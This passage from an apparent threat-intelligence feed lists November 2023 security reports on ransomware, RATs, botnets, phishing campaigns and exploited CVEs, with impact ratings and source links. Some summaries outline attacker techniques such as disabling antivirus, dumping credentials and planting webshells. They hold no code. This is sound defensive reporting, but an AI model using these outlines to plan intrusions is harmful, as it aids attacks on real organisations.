Researchers from SANS observed the old Quasar RAT payload being delivered through an updated SharpLoader. Its purpose is to load and decompress a C# payload from a remote web server or a local file and execute it.
Source: https://isc.sans.edu/diary/rss/30414
2023-11-21
New_SEO_LURKER_Attack_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
New_SEO_LURKER_Attack_Campaign
Date of Scan:
2023-11-21
Impact:
MEDIUM
Summary:
Source: https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/
2023-11-21
Malicious_LNK_File_Campaign_Targeting_Financial_and_Blockchain_Corporations
MEDIUM
+
Intel Source:
Ciberdefensa
Intel Name:
Malicious_LNK_File_Campaign_Targeting_Financial_and_Blockchain_Corporations
Date of Scan:
2023-11-21
Impact:
MEDIUM
Summary:
A recent security alert from AhnLab Security Emergency Response Center (ASEC) reveals a sophisticated campaign distributing malicious LNK files to personnel within financial and blockchain corporations. The malicious files, disguised as legitimate documents, deceive users during the opening process. The LNK files execute obfuscated PowerShell commands, leading to the creation of additional files and potential compromise of systems.
Source: https://ciberdefensa.cat/archivos/30438
2023-11-21
Ddostf_Botnet_Resurfaces_in_DDoS_Attacks
MEDIUM
+
Intel Source:
Kilguard, ASEC
Intel Name:
Ddostf_Botnet_Resurfaces_in_DDoS_Attacks
Date of Scan:
2023-11-21
Impact:
MEDIUM
Summary:
ASEC researchers have shared their concerns about a new campaign targeting MySQL servers and Docker hosts with DDoS malware. Researchers state that this malware is designed to launch DDoS attacks and that the threat actor is operating a DDoS-for-hire service.
Source: https://kilguard.net/ddostf-botnet-resurfaces-in-ddos-attacks-against-mysql-and-docker-hosts/
2023-11-20
The_most_prolific_Phobos_variants_lately
LOW
+
Intel Source:
Talos
Intel Name:
The_most_prolific_Phobos_variants_lately
Date of Scan:
2023-11-20
Impact:
LOW
Summary:
Cisco Talos recently identified the most prolific Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples collected over time. Talos analysts are convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.
Source: https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
2023-11-20
An_Apache_Web_Server_Cryptojacking_Attack_Using_Cobalt_Strike
LOW
+
Intel Source:
ASEC
Intel Name:
An_Apache_Web_Server_Cryptojacking_Attack_Using_Cobalt_Strike
Date of Scan:
2023-11-20
Impact:
LOW
Summary:
Researchers from ASEC have been monitoring threats directed at poorly maintained or unpatched web servers. Web servers are key targets for threat actors because they are publicly accessible in order to provide web services to all users.
Source: https://asec.ahnlab.com/en/59110/
2023-11-20
AI_Crimeware_Ransomware_Surge_Israel_Hamas_Cyber_Warfare
MEDIUM
+
Intel Source:
sentinelone
Intel Name:
AI_Crimeware_Ransomware_Surge_Israel_Hamas_Cyber_Warfare
Date of Scan:
2023-11-20
Impact:
MEDIUM
Summary:
SentinelLabs' latest update delves into current trends shaping the cyber threat landscape. It scrutinizes the evolving landscape of AI-driven crimeware, spotlighting tools like FraudGPT and WolfGPT. Additionally, it details notable ransomware incidents targeting institutions such as ICBC, the Toronto Public Library, and Japan Aviation Electronics.
Source: https://www.sentinelone.com/blog/nov-2023-cybercrime-update-llms-ransomware-and-destructive-wipers-proliferate-in-recent-attacks/
2023-11-20
A_Deep_Dive_into_a_Decade_of_Hack_for_Hire_Operations
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
A_Deep_Dive_into_a_Decade_of_Hack_for_Hire_Operations
Date of Scan:
2023-11-20
Impact:
MEDIUM
Summary:
SentinelLabs' latest report exposes the extensive activities of the Appin Security Group, a prominent player in the hack-for-hire services domain. The comprehensive analysis delves into a myriad of global cyber intrusions involving espionage, surveillance, and disruptive actions across countries such as Norway, Pakistan, China, and India.
Source: https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/
2023-11-20
SolarMarker_Evolution_and_Tactics_Unveiled_in_2023
LOW
+
Intel Source:
Esentire
Intel Name:
SolarMarker_Evolution_and_Tactics_Unveiled_in_2023
Date of Scan:
2023-11-20
Impact:
LOW
Summary:
The eSentire Threat Response Unit (TRU) has closely monitored the SolarMarker malware, also known as Jupyter, since 2021. This .NET-based malware with backdoor capability primarily targets vulnerable WordPress websites to distribute its payload. Over the years, SolarMarker has evolved its decryption routines, transitioning from XOR encryption to AES while maintaining its core functionality.
Source: https://www.esentire.com/blog/solarmarker-to-jupyter-and-back
2023-11-19
Underscore_a_persistent_risk_in_open_source_npm_software
MEDIUM
+
Intel Source:
Security Boulevard
Intel Name:
Underscore_a_persistent_risk_in_open_source_npm_software
Date of Scan:
2023-11-19
Impact:
MEDIUM
Summary:
Recently discovered open source software packages on the npm platform contain scripts broadcasting peace messages related to ongoing conflicts. These packages are examples of protestware, which can be benign or malicious. The risks of protestware are discussed, emphasizing the need for development organizations to investigate the code they rely on.
Source: https://securityboulevard.com/2023/11/protestware-taps-npm-to-call-out-wars-in-ukraine-gaza/
2023-11-18
Python_Developers_Hidden_in_Plain_Sight_For_Nearly_Six_Months
LOW
+
Intel Source:
Checkmarx
Intel Name:
Python_Developers_Hidden_in_Plain_Sight_For_Nearly_Six_Months
Date of Scan:
2023-11-18
Impact:
LOW
Summary:
Researchers at Checkmarx have discovered that a threat actor has been inserting malicious Python packages into the open-source repository for almost six months. Numerous harmful packages are disguising themselves under names that closely resemble well-known, authentic Python packages. As a result, they were downloaded thousands of times.
Source: https://checkmarx.com/blog/attacker-hidden-in-plain-sight-for-nearly-six-months-targeting-python-developers/
2023-11-18
Scattered_Spider
HIGH
+
Intel Source:
CISA
Intel Name:
Scattered_Spider
Date of Scan:
2023-11-18
Impact:
HIGH
Summary:
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023. Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
Source: https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf
2023-11-18
Analysis_of_a_LockBit_Ransomware_Sample
MEDIUM
+
Intel Source:
Antiy
Intel Name:
Analysis_of_a_LockBit_Ransomware_Sample
Date of Scan:
2023-11-18
Impact:
MEDIUM
Summary:
Ransomware was recently used to attack a financial institution. Information from a number of sources suggests that this incident is closely associated with the group behind the LockBit ransomware. Antiy CERT characterizes the link as a "close association" because LockBit is an attack group operating under the "ransomware as a service" (RaaS) paradigm.
Source: https://www.antiy.cn/research/notice&report/research_report/LockBit.html
2023-11-18
Zimbra_0_day_attacks_on_international_government_organizations
MEDIUM
+
Intel Source:
Google Blog
Intel Name:
Zimbra_0_day_attacks_on_international_government_organizations
Date of Scan:
2023-11-18
Impact:
MEDIUM
Summary:
Google's Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server. Four different groups were observed exploiting the same bug to steal data, credentials, and tokens. TAG urges users to keep software up-to-date and apply security updates to protect against these types of exploits. They also add identified websites and domains to Safe Browsing.
Source: https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/
2023-11-18
Dismantling_the_IPStorm_Botnet_Infrastructure
LOW
+
Intel Source:
Intezer
Intel Name:
Dismantling_the_IPStorm_Botnet_Infrastructure
Date of Scan:
2023-11-18
Impact:
LOW
Summary:
The FBI disclosed the breakdown of a botnet proxy network by US law enforcement and the guilty plea of the person in charge of the botnet infrastructure connected to the IPStorm virus. In the continuous fight against cyberthreats, this accomplishment represents a critical turning point. As the new IPStorm malware versions and capabilities spread to infect Linux, Mac, and Android devices worldwide, the research team at Intezer shared their discoveries and analysis with the FBI to aid in their case.
Source: https://intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/
2023-11-18
A_new_round_of_attacks_by_the_Youshe_group
LOW
+
Intel Source:
Antiy CERT
Intel Name:
A_new_round_of_attacks_by_the_Youshe_group
Date of Scan:
2023-11-18
Impact:
LOW
Summary:
Recently, Antiy CERT has detected a new round of phishing attacks by the "Youshe" black-industry gang ("Silver Fox") targeting financial personnel and the customer service staff of small store merchants. In this round of attacks, the gang disguised the malicious program as a document file and packaged it into a compressed archive. It spread through the model of "black-industry gang, agent, recruited members, target hunting", inducing users to execute the file and thereby obtaining remote control of the victim host.
Source: https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis.html
2023-11-18
Remcos_RAT_attacks_disguised_as_SBU_request
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Remcos_RAT_attacks_disguised_as_SBU_request
Date of Scan:
2023-11-18
Impact:
MEDIUM
Summary:
The government computer emergency response team of Ukraine, CERT-UA, detected the mass distribution of e-mails, allegedly on behalf of the Security Service of Ukraine, with an attachment in the form of a RAR file "Electronic request of the SBU of Ukraine.rar".
Source: https://cert.gov.ua/article/6276351
2023-11-17
MSIX_Package
LOW
+
Intel Source:
ISC. SANS
Intel Name:
MSIX_Package
Date of Scan:
2023-11-17
Impact:
LOW
Summary:
This article discusses the MSIX package file format and how GHOSTPULSE malware was identified to bypass security controls. It explains how a hunting rule was created to detect ZIP archives containing two files, and provides an example of a low VT score MSIX file. It also explains the content of the wrapper and config files, and how the script "worldhack.ps1" is automatically executed during package installation, with the payload identified as Redline.
Source: https://isc.sans.edu/diary/rss/30404
2023-11-17
Cyberattack_on_Danish_Critical_Infrastructure_Linked_to_Russian_Hackers
MEDIUM
+
Intel Source:
Sekto CERT
Intel Name:
Cyberattack_on_Danish_Critical_Infrastructure_Linked_to_Russian_Hackers
Date of Scan:
2023-11-17
Impact:
MEDIUM
Summary:
Possible connections exist between Russian threat actors and what has been called the "largest cyber attack against Danish critical infrastructure," which took place in May 2023 and targeted 22 businesses involved in the nation's energy management.
Source: https://sektorcert.dk/wp-content/uploads/2023/11/SektorCERT-The-attack-against-Danish-critical-infrastructure-TLP-CLEAR.pdf
2023-11-17
The_NoEscape_ransomware_roundup
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
The_NoEscape_ransomware_roundup
Date of Scan:
2023-11-17
Impact:
MEDIUM
Summary:
NoEscape ransomware group emerged in May 2023 and runs a Ransomware-as-a-Service program targeting multiple industry verticals, primarily in the US. It encrypts files and leaves a ransom note, and victims can contact the threat actor through a TOR site. Fortinet customers are protected, and best practices are provided to protect against ransomware.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-noescape
2023-11-17
Distribution_of_malware_mimicking_a_LNK
LOW
+
Intel Source:
ASEC
Intel Name:
Distribution_of_malware_mimicking_a_LNK
Date of Scan:
2023-11-17
Impact:
LOW
Summary:
Malicious shortcut files are being distributed by a threat actor targeting individuals in the field of Korean reunification and national security. The malware breaches user information and downloads additional malware, including TutRAT, which allows malicious behaviors such as keylogging and stealing browser account information. AhnLab recommends subscribing to their threat intelligence platform to check related IOCs.
Source: https://asec.ahnlab.com/en/59042/
2023-11-17
An_Extensive_Data_Wiping_Operation_Aimed_Against_Israel
MEDIUM
+
Intel Source:
Securityjoes
Intel Name:
An_Extensive_Data_Wiping_Operation_Aimed_Against_Israel
Date of Scan:
2023-11-17
Impact:
MEDIUM
Summary:
Researchers at SecurityJoes have investigated a sophisticated security compromise that resulted in substantial data loss affecting multiple businesses. Defense contractors and an Israeli data hosting provider were among the targets.
Source: https://www.securityjoes.com/post/mission-data-destruction-a-large-scale-data-wiping-campaign-targeting-israel
2023-11-17
Rhysida_Ransomware
HIGH
+
Intel Source:
CISA
Intel Name:
Rhysida_Ransomware
Date of Scan:
2023-11-17
Impact:
HIGH
Summary:
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a
2023-11-16
Dark_Pink_APT_Deployments
MEDIUM
+
Intel Source:
Cyber Geeks
Intel Name:
Dark_Pink_APT_Deployments
Date of Scan:
2023-11-16
Impact:
MEDIUM
Summary:
The Asia-Pacific (APAC) region is currently experiencing a surge in advanced persistent threat (APT) attacks, which have been linked to a recently discovered group called Dark Pink (also known as the Saaiwc Group). Even though there is evidence that Dark Pink started operating as early as mid-2021, the group's activity really picked up in the latter half of 2022.
Source: https://cyberint.com/blog/research/dark-pink-apt-attacks/
2023-11-16
The_skimming_campaign_during_holidays
MEDIUM
+
Intel Source:
Malwarebytes
Intel Name:
The_skimming_campaign_during_holidays
Date of Scan:
2023-11-16
Impact:
MEDIUM
Summary:
The article discusses the rise of credit card skimming during the holiday shopping season. It explains malicious code is often embedded in merchant websites, making it difficult to detect when credit card information is stolen. It also mentions the Kritec skimming campaign, active since March 2023, and provides advice on how to shop safely online and a list of indicators of compromise associated with the Kritec campaign.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/credit-card-skimming-on-the-rise-for-the-holiday-shopping-season
2023-11-16
Active_Vulnerability_Exploitation_for_Citrix_and_Big_IP
LOW
+
Intel Source:
Cyble
Intel Name:
Active_Vulnerability_Exploitation_for_Citrix_and_Big_IP
Date of Scan:
2023-11-16
Impact:
LOW
Summary:
Researchers at Cyble have discovered that recently discovered vulnerabilities—which were first mentioned in the most recent Cybersecurity and Infrastructure Security Agency (CISA) advisory—are still being exploited. By releasing security alerts for the Big IP vulnerabilities (CVE-2023-46747, CVE-2023-46748) on October 31 and the actively exploited Citrix vulnerability (CVE-2023-4966) on October 10, CISA demonstrated proactive actions.
Source: https://cyble.com/blog/active-exploitation-of-big-ip-and-citrix-vulnerabilities-observed-by-cyble-global-sensor-intelligence-network/
2023-11-16
Personal_Attacks_on_Romanian_Gas_Companies
LOW
+
Intel Source:
Cyber Geeks
Intel Name:
Personal_Attacks_on_Romanian_Gas_Companies
Date of Scan:
2023-11-16
Impact:
LOW
Summary:
Researchers at Cyber Geeks have examined a scheme that exposes newly registered domains posing as well-known Romanian gas companies.
Source: https://cybergeeks.tech/attackers-impersonate-romanian-gas-companies-osint-investigation/
2023-11-16
The_DGAs_New_Face
LOW
+
Intel Source:
Infoblox
Intel Name:
The_DGAs_New_Face
Date of Scan:
2023-11-16
Impact:
LOW
Summary:
Infoblox has been offering DNS detection and response to domain generation algorithms (DGAs) since 2015. DGAs are a common tool used by DNS threat actors to disseminate illicit content, adware, malware, and phishing campaigns.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/rdgas-the-new-face-of-dgas/
2023-11-16
The_Russian_speaking_voter_information_operation_in_Spain
MEDIUM
+
Intel Source:
Quointelligence
Intel Name:
The_Russian_speaking_voter_information_operation_in_Spain
Date of Scan:
2023-11-16
Impact:
MEDIUM
Summary:
Quointelligence researchers provided an account of a recent information operation targeting Spain's Russian-speaking population.
Source: https://quointelligence.eu/2023/11/spanish-election-information-operation-targeting-russian-speakers/?utm_campaign=Weekly%20Intelligence%20Summary&utm_source=hs_email&utm_medium=email&_hsenc=p2ANqtz-_7IVfdWrapH88ypcmqt1GlAB6-Aw2QyyVIghA-QflovrbBHnc-z-J3_JrlkimvWQiWsYTY
2023-11-15
APT_Infrastructure_in_China_Imitates_Cloud_Backup_Services
MEDIUM
+
Intel Source:
GBHackers
Intel Name:
APT_Infrastructure_in_China_Imitates_Cloud_Backup_Services
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
GBHackers researchers have found that Chinese APT actors have targeted and penetrated government agencies in Cambodia. The infrastructure is being used by the threat actors to pose as a cloud backup service. The architecture also shows a number of persistent and malevolent connections.
Source: https://gbhackers.com/chinese-apt-mimics-cloud-backup/
2023-11-15
Ddostf_DDoS_Bot_Malware_Attacking_MySQL_Servers
MEDIUM
Intel Source:
Malware Analysis
Intel Name:
Ddostf_DDoS_Bot_Malware_Attacking_MySQL_Servers
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
Ddostf DDoS bot is a malware family targeting vulnerable MySQL servers. First identified in 2016 and known to operate in both Windows and Linux environments, the bot conducts Distributed Denial of Service attacks. Attackers reach MySQL servers over TCP port 3306, often through brute-force or dictionary attacks, and may also exploit system vulnerabilities. The Ddostf bot employs User-Defined Function (UDF) DLLs to execute commands on the infected system, including downloading and executing additional malware. Ddostf copies itself under a random name in the system directory, registers as a service, and connects to a command-and-control server, to which it sends system information.
Source: https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611
2023-11-15
The_exploitation_of_disguised_media_websites
MEDIUM
Intel Source:
Malware news
Intel Name:
The_exploitation_of_disguised_media_websites
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
The linked article reports that a national cyber security center has detected influence operations exploiting China's disguised media websites; the details are in the original report.
Source: https://malware.news/t/national-cyber-security-center-has-detected-influence-operations-exploiting-china-s-disguised/75617
2023-11-15
Medusa_RaaS
MEDIUM
Intel Source:
nccgroup
Intel Name:
Medusa_RaaS
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
Researchers have analyzed the Medusa ransomware, a Ransomware-as-a-Service active since 2021, known for its double-extortion method. In a recent incident, initial access was gained through an exploited web server, leading to the deployment of webshells for continuous access. The attackers executed a range of activities, including using PowerShell to disable antivirus services, dumping password hashes, and exfiltrating data. The ransomware, which encrypts and threatens to release data unless a ransom is paid, was deployed over a 271-day period, utilizing various techniques for persistence and defense evasion. These included creating new user accounts, uploading web shells, and disabling Windows Defender. Lateral movement within the network was facilitated through Remote Desktop Protocol, and command-and-control was maintained via a reverse tunnel. The attack culminated in the deployment of the Medusa ransomware, resulting in encrypted files with the .MEDUSA extension and significant system recovery impediments due to the deletion of VMs and backups.
Source: https://research.nccgroup.com/2023/11/13/dont-throw-a-hissy-fit-defend-against-medusa/
2023-11-15
A_malware_strain_distribution_through_breached_legitimate_website
LOW
Intel Source:
ASEC
Intel Name:
A_malware_strain_distribution_through_breached_legitimate_website
Date of Scan:
2023-11-15
Impact:
LOW
Summary:
AhnLab EDR detected a malware strain distributed through breached legitimate websites using LNK files. The EDR records file infiltration and exfiltration and allows users to view the infiltration path and file information. The malicious features of the script include executing another script, collecting system information, registering itself in the autorun registry, and sending data. AhnLab EDR protects the endpoint environment by providing behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting.
Source: https://asec.ahnlab.com/en/58919/
2023-11-15
The_dangers_of_viewing_Clickbait_sites
MEDIUM
Intel Source:
PaloAlto
Intel Name:
The_dangers_of_viewing_Clickbait_sites
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
This article discusses the vulnerability CVE-2023-3169, which affects WordPress sites using the Newspaper and Newsmag themes with the Composer plugin. It reveals a massive campaign using the Balada Injector to exploit the vulnerability, and provides an example of the malicious script injected into webpages. It also outlines the trend of clickbait and ad sites being compromised at a nearly three to one ratio compared to other categories. Finally, it provides advice for readers to be aware of the risk and adjust their browsing habits accordingly.
Source: https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/
2023-11-15
The_increase_of_ransomware_attacks_on_the_energy_sector_and_on_nuclear_energy_firms
HIGH
Intel Source:
Resecurity
Intel Name:
The_increase_of_ransomware_attacks_on_the_energy_sector_and_on_nuclear_energy_firms
Date of Scan:
2023-11-15
Impact:
HIGH
Summary:
Resecurity has identified a potential breach of Doosan's Active Directory and other nuclear research organizations, as well as a BlackCat Ransomware attack on the European energy sector in February 2022. Additionally, threat actors have been targeting nuclear-energy firms and related entities, such as Brazil's National Nuclear Energy Commission, Israel's Neve Ne'eman nuclear reactor, and Indonesia's National Nuclear Energy Agency (Batan). In April 2022, Oil India Limited (OIL) was hit by a ransomware attack, and in March 2022, State Electric Company Limited (STELCO) in Maldives experienced a ransomware attack by the Hive group.
Source: https://www.resecurity.com/blog/article/ransomware-attacks-against-the-energy-sector-on-the-rise-nuclear-and-oil-gas-are-major-targets-2024
2023-11-15
TA402_with_IronWind_Infection_target_Middle_East_Based_Government
HIGH
Intel Source:
Proofpoint
Intel Name:
TA402_with_IronWind_Infection_target_Middle_East_Based_Government
Date of Scan:
2023-11-15
Impact:
HIGH
Summary:
From July to October 2023, researchers observed the TA402 group executing targeted phishing campaigns against Middle East and North Africa government entities using a complex infection chain called IronWind. The group varied its attack methods, shifting from Dropbox links to XLL and RAR file attachments to deliver the multifunctional malware. TA402's campaigns involved phishing emails with lures related to economic themes or regional conflicts, utilizing compromised email accounts to deliver malware that communicated with a command-and-control domain. The IronWind downloader initiated a multi-stage infection process, involving a .NET executable and shellcode, aimed at espionage and intelligence collection. The group consistently employed geofencing techniques to hinder detection and maintained a focus on specific targets, despite ongoing regional conflicts. This activity demonstrates TA402's persistent and evolving approach to cyber espionage.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta402-uses-complex-ironwind-infection-chains-target-middle-east-based-government
2023-11-15
Nitrogen_Campaign_2
MEDIUM
Intel Source:
Esentire
Intel Name:
Nitrogen_Campaign_2
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
Researchers observed multiple incidents from a new Nitrogen campaign leading to ALPHV/BlackCat Ransomware infections. This campaign involved drive-by downloads where users inadvertently installed malicious software from compromised websites or through deceptive search advertisements. The initial infection was traced to an unmanaged device with access to the customer’s network, involving the download of Nitrogen payloads. The ISO file related to the infection contained several files, including executables and DLLs that decrypted additional ZIP archives containing malicious payloads. The campaign utilized encrypted commands in scheduled tasks and employed advanced techniques like transacted hollowing for process injection. Researchers noted enhanced capabilities in the malware, including AMSI bypass, ETW and WLDP patching, and antivirus evasion. The post-exploitation activities included lateral movement, data exfiltration, and the deployment of ALPHV ransomware, which encrypted files and exfiltrated data, significantly impacting the affected organizations.
Source: https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware
2023-11-15
C3RB3R_Ransomware_Ongoing_Exploitation_of_CVE_2023_22518_Targets_Unpatched_Confluence_Servers
MEDIUM
Intel Source:
SentinelOne
Intel Name:
C3RB3R_Ransomware_Ongoing_Exploitation_of_CVE_2023_22518_Targets_Unpatched_Confluence_Servers
Date of Scan:
2023-11-15
Impact:
MEDIUM
Summary:
Researchers have observed an increase in the exploitation of CVE-2023-22518, a vulnerability in Atlassian's Confluence Data Center and Server, which allows unauthorized creation of backdoor administrator accounts. This vulnerability has been leveraged in multiple campaigns to deploy new Cerber ransomware variants, targeting both Windows and Linux hosts. The attack begins with a specially crafted HTTP POST request to the exposed Confluence instance, leading to administrative control. Attackers then execute PowerShell scripts to download and execute the ransomware payloads. These payloads, observed on remote servers, include Linux and Windows versions of Cerber, which encrypt files and append a ".L0CK3D" extension, while also attempting to remove Volume Shadow Copies. The ransomware leaves a note with a unique Tor-based portal for victims to pay the ransom.
Source: https://www.sentinelone.com/blog/c3rb3r-ransomware-ongoing-exploitation-of-cve-2023-22518-targets-unpatched-confluence-servers/
2023-11-14
Phishing_PDF_Files_Downloading_Malicious_Packages
LOW
Intel Source:
ASEC
Intel Name:
Phishing_PDF_Files_Downloading_Malicious_Packages
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
PDFs disguised as game downloads or cracked software lead users to a website where they download an encrypted file. Upon decryption and execution, this file, "File.exe," modifies registry values to disable Windows Defender and steals IP and location information along with browser login data. It then downloads various types of malware, including ransomware, PUPs, infostealers, and droppers. The malware creates multiple subfiles and folders, significantly compromising the infected system. This campaign demonstrates the sophisticated methods used to distribute and execute multiple malware types, highlighting the need for caution when handling files from untrusted sources.
Source: https://asec.ahnlab.com/en/58660/
2023-11-14
THE_NEW_APT_GROUP_DARKCASINO_AND_THE_GLOBAL_SURGE_IN_WINRAR_0_DAY_EXPLOITS
MEDIUM
Intel Source:
NSFocus
Intel Name:
THE_NEW_APT_GROUP_DARKCASINO_AND_THE_GLOBAL_SURGE_IN_WINRAR_0_DAY_EXPLOITS
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
DarkCasino is economically motivated and targets industries such as cryptocurrency trading, online casinos, and online banking. Its primary attack vectors are watering-hole phishing and spear phishing. The CVE-2023-38831 vulnerability allows arbitrary code execution in WinRAR, which DarkCasino began exploiting in April 2023. This vulnerability became a significant tool for attackers, with widespread exploitation observed by various APT groups, including DarkPink in Southeast Asia and Konni in East Asia, targeting government agencies and refining their attack processes and techniques.
Source: https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/
2023-11-14
Stealc_Stealer
MEDIUM
Intel Source:
FarghlyMal
Intel Name:
Stealc_Stealer
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
Stealc, a sophisticated information stealer, stands out for its non-resident nature and flexible data collection settings. Its development draws inspiration from other well-known stealers like Vidar, Raccoon, Mars, and Redline. Notably, Stealc can exfiltrate a vast array of data directly to a Command & Control server, bypassing traditional on-disk staging. This includes browser-based information like logins, credit card details, cookies, and history, along with wallet extensions, local crypto wallet files, various account tokens, and configuration files from applications like Discord, Telegram, Steam, qTox, and Pidgin. Stealc can also take screenshots of the victim's machine. The malware employs techniques like opaque predicates for obfuscation and base64 encoding with RC4 decryption for its configuration, highlighting its complexity and evasive capabilities.
Source: https://farghlymal.github.io/Stealc-Stealer-Analysis/
2023-11-14
Bitter_Pill_Third_Party_Pharmaceutical_Vendor_Linked_to_Pharmacy_and_Health_Clinic_Cyberattack
LOW
Intel Source:
Huntress
Intel Name:
Bitter_Pill_Third_Party_Pharmaceutical_Vendor_Linked_to_Pharmacy_and_Health_Clinic_Cyberattack
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
Attackers exploited a locally hosted instance of ScreenConnect, a remote access tool used by Outcomes. The attack involved four instances of ScreenConnect across two distinct endpoints, with one instance used on both endpoints. Tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) were similar across these endpoints. The attackers ensured persistent access by installing additional remote access tools such as ScreenConnect or AnyDesk. One endpoint, a Windows Server 2019 Standard system in the pharmaceutical field, showed repeated access via ScreenConnect from August 9, 2023, highlighting the sustained nature of the attack.
Source: https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack
2023-11-14
OracleIV
MEDIUM
Intel Source:
Cado Security
Intel Name:
OracleIV
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named "oracleiv_latest," contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through an HTTP POST request to Docker's API, pulling the malicious image from Docker Hub. The malware connects to a Command and Control server for instructions, using novel authentication methods.
Source: https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/
2023-11-14
Ongoing_Exploitation_of_Critical_Atlassian_Authentication_Bypass_Vulnerability_CVE_2023_22518
LOW
Intel Source:
ISC.SANS
Intel Name:
Ongoing_Exploitation_of_Critical_Atlassian_Authentication_Bypass_Vulnerability_CVE_2023_22518
Date of Scan:
2023-11-14
Impact:
LOW
Summary:
This report outlines the active exploitation of a severe authentication bypass vulnerability (CVE-2023-22518) in Atlassian products. Despite initial reassurances from Atlassian, evidence reveals ongoing exploitation attempts, with attackers targeting specific URLs and utilizing a common header. The first incidents were detected on November 2nd, originating from diverse IP addresses, including Digital Ocean, Indian, and US-based sources. Notably, a parallel scan for the unrelated /rest/api/user URL suggests broader security concerns. Organizations are urged to take immediate action, applying patches and monitoring for suspicious activity to safeguard their Atlassian instances.
Source: https://isc.sans.edu/diary/Exploit+Activity+for+CVE202322518+Atlassian+Confluence+Data+Center+and+Server/30376/
2023-11-14
CVE_2023_36884_and_CVE_2023_36584
MEDIUM
Intel Source:
Palo Alto
Intel Name:
CVE_2023_36884_and_CVE_2023_36584
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
CVE-2023-36584 has been used in a cyberattack campaign by a pro-Russian APT group, Storm-0978 (also known as the RomCom Group). This campaign, observed in July 2023, targeted groups supporting Ukraine's admission into NATO. The attack utilized a sophisticated exploit chain involving a remote code execution vulnerability in Microsoft Office (CVE-2023-36884) to deliver malware. The lure was a weaponized Microsoft Word document, disguised as talking points for the NATO Summit on Ukraine. The vulnerability allowed bypassing of Microsoft's Mark-of-the-Web security feature, a critical aspect in the attack's success.
Source: https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/
2023-11-14
Modern_Asian_APT_Groups
MEDIUM
Intel Source:
Kaspersky Content Hub
Intel Name:
Modern_Asian_APT_Groups
Date of Scan:
2023-11-14
Impact:
MEDIUM
Summary:
This report provides comprehensive intelligence on Asian Advanced Persistent Threat (APT) groups, aiming to equip cybersecurity professionals with the knowledge to counteract these threats. It details incidents across the globe, the tactics, techniques, and procedures (TTPs) employed by these groups, and the pattern of attacks that span various countries and industries. The report is structured to aid a wide range of cybersecurity roles, including SOC analysts and C-Level executives, with technical details, mitigation strategies, and statistics on attack victims. It's intended as a valuable resource for detecting and defending against the sophisticated tools and techniques of Asian APT actors.
Source: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf
2023-11-14
Ducktail_malware_spreading_through_fake_clothing_job_ads
LOW
Intel Source:
Kaspersky
Intel Name:
Ducktail_malware_spreading_through_fake_clothing_job_ads
Date of Scan:
2023-11-14
